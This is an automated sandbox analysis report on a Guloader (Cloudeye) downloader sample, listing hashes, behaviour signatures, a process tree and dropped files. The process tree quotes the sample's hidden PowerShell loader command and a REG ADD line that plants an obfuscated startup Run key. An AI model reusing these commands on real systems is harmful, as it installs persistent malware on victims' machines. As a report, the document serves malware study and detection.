Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    01/05/2024, 01:07

General

  • Target

    00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe

  • Size

    391KB

  • MD5

    1e7b3c55e65b93ed3750462bd4e8d58b

  • SHA1

    abec5b9ca7157ab21fb9a5e72ef01f0a15f11a51

  • SHA256

    00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c

  • SHA512

    b75f4bc04c0ec6c0cc49c06a3290c2bfe53eabb9c530660d295d58273636c512613cf9ebd5246dcd1848f155a51f14eaa7c7dc26ce59a97721d5afecdb69ca2a

  • SSDEEP

    12288:HTg5hqq7yL3B2MWy45NDr6K8AVBQ//pR8iQXL:HTg7qdLxn45pJrVBQnnBQXL

Malware Config

Signatures

  • Guloader, Cloudeye

    A shellcode-based downloader first seen in 2020.

  • Adds Run key to start application (2 TTPs, 1 IoCs)
  • Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (1 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key (1 TTPs, 1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (8 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of WriteProcessMemory (22 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe
    "C:\Users\Admin\AppData\Local\Temp\00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Dimissorernes=Get-Content 'C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Retshandlingerne29.Dat';$Skoletandlges=$Dimissorernes.SubString(59193,3);.$Skoletandlges($Dimissorernes)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1392
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2440
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Udmark% -windowstyle minimized $Boblekamre=(Get-ItemProperty -Path 'HKCU:\Halvfemsaarsfdselsdages\').Milkwood;%Udmark% ($Boblekamre)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:372
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Udmark% -windowstyle minimized $Boblekamre=(Get-ItemProperty -Path 'HKCU:\Halvfemsaarsfdselsdages\').Milkwood;%Udmark% ($Boblekamre)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:776

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      96b58cc0d155b0df26bd5069c4a8a0f1

      SHA1

      e65aef58642e8de6b68b234ec6396ced1226986f

      SHA256

      14668df554379d43dca78ffab4b1a38887654356f0fccd4d8d8ab549ac3078b2

      SHA512

      68b39be0acb59c133b02fdf549ad0d65e06acbd69c4fde4067d82c0b3e1646d8dcc0ad905dc5b03acaef74ad307c3dfbe34146c39aefab44675b24e223cebfc2

    • C:\Users\Admin\AppData\Local\Temp\Cab2CFC.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar2E4A.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Kladdebger.Svi

      Filesize

      328KB

      MD5

      91f9880b33408373db6257b678a4a0bf

      SHA1

      912a4ec00cac46c0b15d53d539039a77137bd86e

      SHA256

      12b35dc28be02873ee8b345ac4a38eeda408aa7505a2f836aa32e3467d939008

      SHA512

      b6747b3d21b8b1e91d212863a2969f1b20b18c4686e71df6fec7d96ff05b74470cd7c063ad7fa47dca467e5e462476feb13b9ddeedfb370283b0fc11a8af454e

    • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Retshandlingerne29.Dat

      Filesize

      57KB

      MD5

      6db11b1548b28a3b9b2b3e3147cddc04

      SHA1

      7f62e36b96a2d2264a21e98b17cbb6b0710f4335

      SHA256

      af7a18872951b3eef11a71013231b42a2ef418191580cd16505cb8bd4dae8cde

      SHA512

      7e77a496ea3b44479a20a0e9edfd61fcd322ee6365cda15ab908228b936a6219e6fd3162277e46127e532dc51a95b77cf43506caa60060c426510b9721a531dd

    • memory/1392-11-0x0000000002550000-0x0000000002590000-memory.dmp

      Filesize

      256KB

    • memory/1392-14-0x00000000063B0000-0x00000000074ED000-memory.dmp

      Filesize

      17.2MB

    • memory/1392-15-0x0000000073900000-0x0000000073EAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1392-16-0x0000000002550000-0x0000000002590000-memory.dmp

      Filesize

      256KB

    • memory/1392-18-0x0000000005120000-0x0000000005220000-memory.dmp

      Filesize

      1024KB

    • memory/1392-12-0x0000000005120000-0x0000000005220000-memory.dmp

      Filesize

      1024KB

    • memory/1392-6-0x0000000073900000-0x0000000073EAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1392-8-0x0000000073900000-0x0000000073EAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1392-7-0x0000000002550000-0x0000000002590000-memory.dmp

      Filesize

      256KB

    • memory/2452-19-0x0000000000620000-0x0000000001682000-memory.dmp

      Filesize

      16.4MB

    • memory/2452-103-0x0000000001690000-0x00000000027CD000-memory.dmp

      Filesize

      17.2MB